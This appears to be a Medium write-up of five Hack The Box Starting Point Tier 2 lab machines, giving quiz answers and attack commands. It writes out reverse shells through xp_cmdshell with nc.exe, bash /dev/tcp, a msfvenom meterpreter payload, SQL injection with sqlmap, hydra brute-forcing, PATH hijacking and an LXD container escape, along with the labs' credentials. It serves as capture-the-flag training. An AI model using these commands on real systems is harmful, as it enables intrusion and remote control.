Write-up: Hack The Box: Starting Point — Tier 2

Box 1: Archetype

  • Which TCP port is hosting a database server? 1433
  • What is the name of the non-Administrative share available over SMB? backups
$ smbclient \\\\\\backups -U guest
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
impacket-mssqlclient 'ARCHETYPE/sql_svc':'M3g4c0rp123'@10.129.116 -windows-auth
  • What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server? mssqlclient.py
  • What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure; - Enabling the sp_configure as stated in the above error message EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE
$ python3 -m http.server 80 $ sudo nc -lnvp 443
SQL> xp_cmdshell curl --output C:\Users\sql_svc\nc.exe SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc; .\nc.exe -e cmd.exe 443"
  • What script can be used in order to search possible paths to escalate privileges on Windows hosts? winpeas
  • What file contains the administrator’s password? MEGACORP_4dm1n!!
$ impacket-psexec administrator@
  • Submit user flag — Try by yourself!
  • Submit root flag — Try by yourself!

Box 2: Oopsie

  • What is the path to the directory on the webserver that returns a login page? cdn-cgi/login
  • What can be modified in Firefox to get access to the upload page? cookie
i=0 while [ $i -le 200 ] do echo $i >> numbers.txt i=$(($i+1)) done
<?php $conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage'); ?>
$ groups robert robert : robert bugtracker
$ find / -group bugtracker 2>/dev/null
$ ls -l /usr/bin/bugtracker -rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker $ file /usr/bin/bugtracker /usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped
  • What executible is run with the option “-group bugtracker” to identify all files owned by the bugtracker group? find
  • Regardless of which user starts running the bugtracker executable, what’s user privileges will use to run? root
  • What SUID stands for? Set owner User ID
robert@oopsie:~$ echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
robert@oopsie:~$ export PATH=/tmp:$PATH
  • What is the name of the executable being called in an insecure manner? cat
  • Submit user flag — Try by yourself!
  • Submit root flag — Try by yourself!

Box 3: Vaccine

  • Besides SSH and HTTP, what other service is hosted on this box? FTP
  • This service can be configured to allow login with any password for specific username. What is that username? anonymous
  • What is the name of the file downloaded over this service? backup.zip
$ zip2john backup.zip > hash.txt $ john hash.txt $ unzip backup.zip
<?php session_start(); if(isset($_POST['username']) && isset($_POST['password'])) { if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") { $_SESSION['login'] = "true"; header("Location: dashboard.php"); } } ?>
$ sqlmap -u '' --data 'search=P' --cookie='PHPSESSID=ton2h67hjn3plqh6r9k496dpe0' --os-shell
os-shell> bash -c "bash -i >& /dev/tcp/ 0>&1"
try { $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!"); }
  • What program can the postgres user run as root using sudo? vi
  • Submit user flag — Try by yourself!
  • Submit root flag — Try by yourself!

Box 4: Included

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=4444 -f raw > shell.php
  • What is the default system folder that TFTP uses to store files? /var/lib/tftpboot
  • Which interesting file is located in the web server folder and can be used for Lateral Movement? .htpasswd
git clone https://github.com/saghul/lxd-alpine-builder.git cd lxd-alpine-builder ./build-alpine
lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage lxc image list lxc init myimage ignite -c security.privileged=true lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true lxc start ignite lxc exec ignite /bin/sh
  • What flag do we set to the container so that it has root privileges on the host system? security.privileged=true
  • If the root filesystem is mounted at /mnt in the container, where can the root flag be found on the container after the host system is mounted? /mnt/root/root
  • Submit user flag — Try by yourself!
  • Submit root flag — Try by yourself!

Box 5: Markup

$ hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwo rds/Common-Credentials/best15.txt http-post-form "/:username=^USER^&password=^PASS^:Wrong Credentials" -V
  • What is the word at the top of the page that accepts user input? order
  • What XML version is used on the target? 1.0
  • What does the XXE / XEE attack acronym stand for? XML External Entity
$ ssh daniel@ -i id_rsa
PS > wget -O nc.exe PS > echo "C:\Log-Management\nc64.exe -e cmd.exe 443" > C:\Log-Management\job.bat PS > type job.bat C:\Log-Management\nc64.exe -e cmd.exe 443
  • Submit user flag — Try by yourself!
  • Submit root flag — Try by yourself!




Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


More from Medium


TryHackMe-Gotta Catch’em All!(Pokemon)- Walkthrough by Subhadip Nag(MrL0s3r)

Retro— TryHackMe Walkthrough

TryHackMe : BrainPan 1